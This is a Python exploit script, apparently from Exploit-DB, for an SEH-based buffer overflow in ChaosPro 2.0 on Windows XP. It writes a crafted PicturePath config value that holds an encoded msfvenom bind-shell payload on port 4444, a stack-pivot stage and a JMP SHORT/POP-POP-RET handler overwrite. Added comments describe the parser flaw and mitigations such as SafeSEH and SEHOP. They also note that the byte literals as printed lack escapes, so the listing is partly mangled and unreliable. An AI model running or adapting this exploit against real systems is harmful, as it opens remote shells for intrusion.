
ChaosPro 2.0 – Buffer Overflow (SEH)



# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM

#!/usr/bin/env python2
import os, sys


# sploit = "A"* 5000  ## Crash! 41414141 in SEH! via ProfilePath or PicturePath.  Windows XP OEM
# `locate pattern_create.rb | head -n 1` 5000  #  326d4431
# `locate pattern_offset.rb | head -n 1` 326d4431 5000  #  2705
# sploit = "A" * (2705 -  4 - 126)  # 2575
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
# `locate pattern_offset.rb|head -n 1` 61413561 2575
# 16


################ Second stage ####################
# Second stage: the data that ends up at the start of the overflowed buffer.
# Defender's reading: everything assembled here is plain config-file text.
# The crash note at the top of the file reports that a 5000-byte
# PicturePath/ProfilePath value already overwrites the SEH record, i.e. the
# parser copies the value into a fixed stack buffer without a length check;
# bounding that copy (or rejecting over-long values) is the fix on the
# program side.
sploit = "A"*16  # 16-byte lead-in; offset found with pattern_offset in the notes above
#  msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh 
#, BufferRegister=ESP -b "x00" -e x86/alpha_mixed -i 1 -f c
# NOTE(review): as printed on this page the literals carry no backslash
# escapes ("x54" rather than an escaped byte), so Python stores them as plain
# ASCII text; the "710 bytes" figure below refers to the escaped form.
sploit += (
"x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x69x6cx6bx58x6ex62x77x70"
"x75x50x57x70x71x70x6cx49x68x65x44x71x4bx70x50"
"x64x4ex6bx52x70x36x50x4cx4bx36x32x66x6cx4ex6b"
"x62x72x54x54x6ex6bx72x52x34x68x54x4fx6dx67x50"
"x4ax31x36x30x31x6bx4fx6cx6cx55x6cx71x71x31x6c"
"x53x32x76x4cx67x50x7ax61x48x4fx56x6dx33x31x6b"
"x77x58x62x4ax52x61x42x56x37x6ex6bx52x72x52x30"
"x4cx4bx71x5ax37x4cx4ex6bx32x6cx52x31x50x78x4b"
"x53x37x38x75x51x68x51x62x71x4cx4bx46x39x45x70"
"x53x31x68x53x4cx4bx51x59x64x58x4bx53x64x7ax63"
"x79x6cx4bx34x74x4cx4bx33x31x6bx66x36x51x49x6f"
"x6cx6cx7ax61x58x4fx64x4dx67x71x68x47x70x38x4b"
"x50x64x35x68x76x54x43x43x4dx58x78x67x4bx33x4d"
"x56x44x72x55x79x74x43x68x4cx4bx50x58x46x44x77"
"x71x58x53x65x36x4ex6bx44x4cx62x6bx4cx4bx32x78"
"x45x4cx33x31x6ax73x6cx4bx53x34x6ex6bx46x61x7a"
"x70x4bx39x72x64x57x54x61x34x51x4bx51x4bx35x31"
"x31x49x71x4ax32x71x69x6fx69x70x73x6fx61x4fx52"
"x7ax4cx4bx65x42x4ax4bx6ex6dx53x6dx65x38x75x63"
"x35x62x67x70x45x50x51x78x70x77x71x63x55x62x43"
"x6fx31x44x45x38x52x6cx43x47x65x76x43x37x49x6f"
"x58x55x68x38x6cx50x43x31x67x70x73x30x55x79x6f"
"x34x53x64x66x30x61x78x37x59x6bx30x52x4bx73x30"
"x49x6fx39x45x52x4ax53x38x51x49x46x30x39x72x49"
"x6dx67x30x42x70x71x50x66x30x63x58x48x6ax44x4f"
"x39x4fx59x70x4bx4fx4bx65x4ex77x51x78x37x72x73"
"x30x47x61x43x6cx6cx49x38x66x72x4ax76x70x52x76"
"x42x77x33x58x4bx72x69x4bx47x47x35x37x69x6fx5a"
"x75x63x67x31x78x6fx47x59x79x50x38x79x6fx59x6f"
"x6ex35x71x47x42x48x50x74x68x6cx47x4bx39x71x6b"
"x4fx49x45x73x67x4ex77x31x78x50x75x72x4ex62x6d"
"x61x71x49x6fx58x55x65x38x51x73x70x6dx33x54x47"
"x70x6bx39x7ax43x73x67x72x77x53x67x45x61x6ax56"
"x30x6ax32x32x46x39x51x46x6dx32x4bx4dx62x46x58"
"x47x61x54x47x54x57x4cx36x61x53x31x6cx4dx50x44"
"x44x64x56x70x69x56x57x70x53x74x71x44x62x70x42"
"x76x51x46x76x36x77x36x56x36x42x6ex36x36x50x56"
"x30x53x42x76x42x48x42x59x58x4cx37x4fx4bx36x69"
"x6fx59x45x4bx39x6bx50x42x6ex62x76x47x36x59x6f"
"x54x70x62x48x56x68x6dx57x65x4dx31x70x59x6fx7a"
"x75x6dx6bx49x6ex66x6ex75x62x39x7ax71x78x6ex46"
"x4ax35x4dx6dx6dx4dx79x6fx38x55x65x6cx57x76x31"
"x6cx47x7ax4dx50x79x6bx59x70x52x55x63x35x6fx4b"
"x31x57x37x63x44x32x42x4fx70x6ax35x50x51x43x69"
"x6fx39x45x41x41"
) # 710 bytes
# Pad so the second stage totals 2575 bytes (2705 - 4 - 126 per the notes above).
sploit += "A" * (2575 - 16 - 710)


################ First stage ####################

# ESP: 0012E75C
# ESP target: 0012FF98
## Need to align to four-byte and 16-byte boundaries:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
# 282.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
# 1551.0000
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
# 183C
# 0012FF32   54               PUSH ESP
# 0012FF33   58               POP EAX
# 0012FF34   66:05 3C18       ADD AX,183C
# 0012FF38   50               PUSH EAX
# 0012FF39   5C               POP ESP
# First stage, 8 bytes: stack pivot.  PUSH ESP / POP EAX / ADD AX,183C /
# PUSH EAX / POP ESP moves ESP from 0012E75C to 0012FF98 (difference 183C,
# worked out in the bc lines above).
# NOTE(review): as printed on this page the literals carry no backslash
# escapes ("x54" rather than an escaped byte), so Python stores them as plain
# ASCII text; the byte counts in the trailing comments refer to the escaped form.
sploit += "x54x58x66x05x3cx18x50x5c" # 8


# target instruction to push onto stack at new ESP:  FFE4 JMP ESP # 4141E4FF
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
#    0:	25 28 28 28 28       	and    eax,0x28282828
#    5:	25 47 47 47 47       	and    eax,0x47474747
#    a:	2d 7f 01 7f 7f       	sub    eax,0x7f7f017f
#    f:	2d 7f 01 01 01       	sub    eax,0x101017f
#   14:	2d 03 18 3e 3e       	sub    eax,0x3e3e1803
#   19:	50                   	push   eax
# 26 bytes: the and/and/sub/sub/sub/push sequence listed above, which leaves
# 4141E4FF in EAX and pushes it, so the dword at the new ESP reads "AA" + FFE4
# (JMP ESP) in memory.  Why an and/sub chain rather than a direct push is not
# stated here; presumably a byte restriction on the PicturePath value.
sploit += (
	"x25x28x28x28x28"
	"x25x47x47x47x47"
	"x2dx7fx01x7fx7f"
	"x2dx7fx01x01x01"
	"x2dx03x18x3ex3e"
	"x50"
) # 26 bytes

## Realign new ESP with beginning of overflow buffer:
## New ESP should be four-byte and 16-byte aligned:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
# 122.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
# 671.0000
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
# A7C
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
# 0012FF54   44               INC ESP
# 0012FF55   44               INC ESP
# 0012FF56   44               INC ESP
# 0012FF57   44               INC ESP
# 0012FF58   44               INC ESP
# 0012FF59   44               INC ESP
# 0012FF5A   44               INC ESP
# 0012FF5B   44               INC ESP
# 8 bytes: eight INC ESP, stepping ESP past the dword just pushed so the
# following push does not overwrite it (see the listing above).
sploit += "x44x44x44x44x44x44x44x44" # 8

## Going to have to carve out the address 0012F51C
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
#   0:	25 02 02 02 02       	and    eax,0x2020202
#   5:	25 51 51 51 51       	and    eax,0x51515151
#   a:	2d 7f 01 7f 7f       	sub    eax,0x7f7f017f
#   f:	2d 01 01 01 61       	sub    eax,0x61010101
#  14:	2d 64 08 6d 1f       	sub    eax,0x1f6d0864
#  19:	50                   	push   eax
# 26 bytes: same and/sub technique, this time producing 0012F51C -- the
# address where the overflow buffer starts per the pattern notes at the top.
sploit +=(
	"x25x02x02x02x02"
	"x25x51x51x51x51"
	"x2dx7fx01x7fx7f"
	"x2dx01x01x01x61"
	"x2dx64x08x6dx1f"
	"x50"
) # 26 bytes

## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
# 5C   POP ESP
# 1 byte: POP ESP -> ESP = 0012F51C, the BufferRegister=ESP value the
# alpha_mixed second stage is built for (see the msfvenom line above).
sploit += "x5c" # 1

# Pad the first stage to the 126 bytes that sit between the buffer and the
# SEH record (8 + 26 + 8 + 26 + 1 = 69 bytes used so far).
sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)

################ RET from SEH: JMP SHORT - 126 ####################

# nSEH slot: EB 80 is JMP SHORT with displacement -128 from the following
# instruction, i.e. 126 bytes back from the jump itself; two filler bytes
# complete the dword.
sploit += "xebx80" + "x41x41" # 4
# 00401B44  |. 5F             POP EDI
# 00401B45  |> 5E             POP ESI
# 00401B46  . C3             RETN
# SE handler: 0x00401B44 (POP EDI / POP ESI / RETN per the listing above),
# written little-endian.  Defender's note: an address in the 0x0040xxxx range
# is most likely the program's own image -- TODO confirm; a build with
# SafeSEH and ASLR, or SEHOP at the OS level, would keep this handler from
# being used, independently of fixing the parser's unbounded copy.
sploit += "x44x1bx40x00"


################ build the config ####################
## Running from just outside base directory of ChaosPro:

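def ret_cfg(inp):
	"""Write ``inp`` as the PicturePath value of a ChaosPro config file.

	The file is created (or truncated) relative to the current working
	directory; the comment above says the script is meant to run from just
	outside the ChaosPro base directory.  As printed here the file name has
	no separator between ``chaospro`` and ``ChaosPro.cfg``; a backslash may
	have been lost in rendering.  It is runtime data, so it is left as-is.

	Args:
		inp: text substituted verbatim after ``PicturePath`` -- nothing here
			bounds its length, which is exactly what a hardened parser of this
			file would have to do.
	"""
	# do it live in PicturePath
	cfg = """PicturePath %s""" % inp
	# ``with`` closes the handle on exit; the explicit close() the original
	# carried inside the block was redundant.
	with open("chaosproChaosPro.cfg", 'w') as F:
		F.write(cfg)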

# Entry point: writes the assembled string into the config file.  The only
# thing that makes this dangerous is the program's parse of the file; a
# PicturePath value longer than the destination buffer should be rejected
# there, not trusted.
ret_cfg(sploit)
            





https://www.exploit-db.com/exploits/47551
